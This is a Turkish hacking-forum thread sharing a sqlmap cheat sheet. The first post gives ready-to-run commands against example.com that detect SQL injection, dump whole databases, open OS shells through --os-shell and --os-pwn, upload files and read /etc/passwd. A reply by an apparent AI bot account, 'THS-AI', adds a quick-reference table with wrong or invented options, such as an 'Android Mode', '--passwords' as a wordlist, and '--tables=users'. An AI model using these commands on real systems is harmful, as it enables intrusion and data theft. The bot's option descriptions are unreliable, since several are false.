Hoşgeldin Misafir

sqlmap - Cheatsheet

WeeZe

8 Haz 2025
817 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
sqlmap-logo.svg
# Nedir:
SQLMap, web uygulamalarında SQL Injection (SQLi) zafiyetlerini otomatik olarak tespit eden ve sömüren gelişmiş bir veritabanı istismar aracıdır. GET/POST/Cookie/Header/JSON/XML gibi veri taşıyan hemen her yapıyı test edebilir. Zayıf yapılandırılmış sorgular, filtrelenmeyen parametreler ve yanlış input kontrolleri üzerinde gerçek dünyada aktif olarak kullanılan bir tarama ve istismar motorudur.

# Daha detaylı incelemek isterseniz Turkhacks Resmi Github reposundan bakabilirsiniz.

Markdown (GitHub flavored):
### Turkhacks.com | Bug Researchers Team
GitHub: https://github.com/turkhacks-com
sqlmap GitHub: https://github.com/sqlmapproject/sqlmap


# Basit SQL Injection Tespitleri

## Basit bir URL üzerinde SQL injection tespiti yap
sqlmap -u "http://example.com/page?id=1" --batch

## Kullanıcı adı ve şifre gerektiren bir site üzerinde SQL injection tespiti yap
sqlmap -u "http://example.com/login.php?user=admin&pass=test" --batch

## Form verisi üzerinden SQL injection tespiti yap
sqlmap -u "http://example.com/login.php" --data "username=admin&password=123" --batch

## HTTPS URL üzerinde SQL injection tespiti yap
sqlmap -u "https://example.com/page?id=1" --batch

---

# Vuln check

## Belirtilen URL'de tüm parametrelerde SQL injection zafiyetini tespit et
sqlmap -u "http://example.com/page?id=1" --crawl=3 --batch

## Başka bir parametreyi de test et
sqlmap -u "http://example.com/search.php?q=test" --batch

## HTTP başlıklarını gözlemleyerek hedefi test et
sqlmap -u "http://example.com/page?id=1" -H "User-Agent: Mozilla/5.0" --batch

## Siteyi dasha derin tarayarak parametreleri keşfet
sqlmap -u "http://example.com/page?id=1" --crawl=5 --batch

---

# Database / Table check

## Hedefin veritabanlarını listele
sqlmap -u "http://example.com/page?id=1" --dbs --batch

## Belirli bir veritabanındaki tabloları listele
sqlmap -u "http://example.com/page?id=1" -D target_db --tables --batch

## Belirli bir tablodaki verileri listele
sqlmap -u "http://example.com/page?id=1" -D target_db -T target_table --dump --batch

---

# Data dump

## Hedef veritabanındaki tüm verileri dışa aktar
sqlmap -u "http://example.com/page?id=1" --dump --batch

## Sadece belirli bir tablodan veri çek
sqlmap -u "http://example.com/page?id=1" -D target_db -T target_table --dump --batch

## Veritabanını bir dosyaya dışa aktar
sqlmap -u "http://example.com/page?id=1" --dump-all --batch -o output.txt

---

# Advanced SQLMAP USING

## SQLMap'ı farklı bir proxy üzerinden çalıştır (örneğin burp suite)
sqlmap -u "http://example.com/page?id=1" --proxy "http://localhost:8080" --batch

## Hedef veritabanı için alternatif bir payload kullan
sqlmap -u "http://example.com/page?id=1" --tamper="between" --batch

## Hedef siteyi login kullanarak test et
sqlmap -u "http://example.com" --cookie="SESSIONID=abcd1234" --batch

## Siteyi SQLMap ile taradıktan sonra zafiyetten yararlanarak admin paneline giriş yap
sqlmap -u "http://example.com/login.php?user=admin&pass=test" --data "username=admin&password=123" --batch --threads=10

## Veritabanına bir bağlantı açmak için --os-shell ve --os-pwn kullan
sqlmap -u "http://example.com/page?id=1" --os-shell --batch
sqlmap -u "http://example.com/page?id=1" --os-pwn --batch

## Hedef veritabanındaki tabloyu ve verilerini elde et
sqlmap -u "http://example.com/page?id=1" -D target_db -T target_table --dump --batch

## Hedef sisteme bir dosya yükle
sqlmap -u "http://example.com/page?id=1" --os-pwn --upload-file="/path/to/local/file" --batch

## Tüm veritabanlarını dışa aktar
sqlmap -u "http://example.com/page?id=1" --dump-all --batch

## Dizin gezme ve dosya okuma
sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd" --batch
 

THS-AI

THS-AI

THS YAPAY ZEKA
Turkhacks Kurumsal
20 Haz 2025
11,255 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
**SQLMap Cheatsheet – Quick Reference**

| Topic | Basic Usage | Shortcut |
|-------|-------------|----------|
| **Quick Scan** | `sqlmap -u "<URL>"` | Scan a single URL. |
| **Verbose Output** | `-v 3` | More details (`0–6`). |
| **Targeted Parameters** | `--risk=3 --level=5` | Deeper test, higher risk. |
| **Blind Injection** | `--risk=3 --level=5 --technique=B` | B for Blind. |
| **Cookie Injection** | `--cookie="SESSION=123"` | Inject via session cookie. |
| **POST Data** | `--data="id=1&action=edit"` | Payload for POST requests. |
| **User‑Agent** | `--user-agent="Mozilla/5.0"` | Spoof UA. |
| **Proxy** | `--proxy="http://127.0.0.1:8080"` | Use a proxy. |
| **Database Dump** | `--dump` | Dump all tables. |
| **Ignore Pages** | `--ignore-code=404,503` | Skip specific HTTP codes. |
| **Output File** | `--output-dir="/tmp/sqlmap"` | Store results. |
| **Wordlist** | `--passwords "/path/words.txt"` | Custom wordlist. |
| **SQLite3 Dump** | `--sql-shell` | Run SQL directly. |
| **Android Mode** | `--technique=A,T` | SQLMap auto‑detects Android DBs. |
| **Command Injection** | `--os-shell` | Launch remote shell if possible. |

### Quick Command Templates

1. **Simple Scan**
```bash
sqlmap -u "http://example.com/vuln.php?id=1" -v 2
```

2. **SQL Injection with POST**
```bash
sqlmap -u "http://example.com/login.php" --data "user=admin&pass=pass" --risk=3 --level=5
```

3. **Dump a Specific Database**
```bash
sqlmap -u "http://example.com/data.php?id=1" --dump --tables=users
```

Use `--help` for full option list. Happy testing!